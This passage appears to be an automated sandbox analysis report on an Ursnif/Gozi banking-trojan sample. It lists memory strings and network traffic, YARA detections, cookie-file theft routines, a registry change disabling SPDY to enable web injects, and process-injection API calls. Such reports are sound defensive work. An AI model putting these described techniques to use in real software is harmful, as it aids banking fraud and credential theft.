Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000024.00000000.431688638.0000000008BB0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	2_2_054222F7

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027734D0 NtMapViewOfSection,	2_2_027734D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02774F73 GetProcAddress,NtCreateSection,memset,	2_2_02774F73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027711A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_027711A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277B159 NtQueryVirtualMemory,	2_2_0277B159
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	2_2_0540E529
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05410D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	2_2_05410D8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	2_2_0540CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	2_2_05415E21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_0541C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05405E8A NtQueryInformationProcess,	2_2_05405E8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05422AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	2_2_05422AAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05414518 NtGetContextThread,RtlNtStatusToDosError,	2_2_05414518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_054105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	2_2_054105FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05408F6D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_05408F6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_054117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	2_2_054117CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05422E10 NtQuerySystemInformation,RtlNtStatusToDosError,	2_2_05422E10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540E6C4 memset,NtQueryInformationProcess,	2_2_0540E6C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05403934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	2_2_05403934
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	2_2_0540A818
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540F314 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_0540F314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05402A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_05402A0A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_054235BC CreateProcessAsUserA,

2_2_054235BC

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027728E9	2_2_027728E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277AF34	2_2_0277AF34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05423C5C	2_2_05423C5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541BC93	2_2_0541BC93
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541CFA3	2_2_0541CFA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05421669	2_2_05421669
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05412678	2_2_05412678
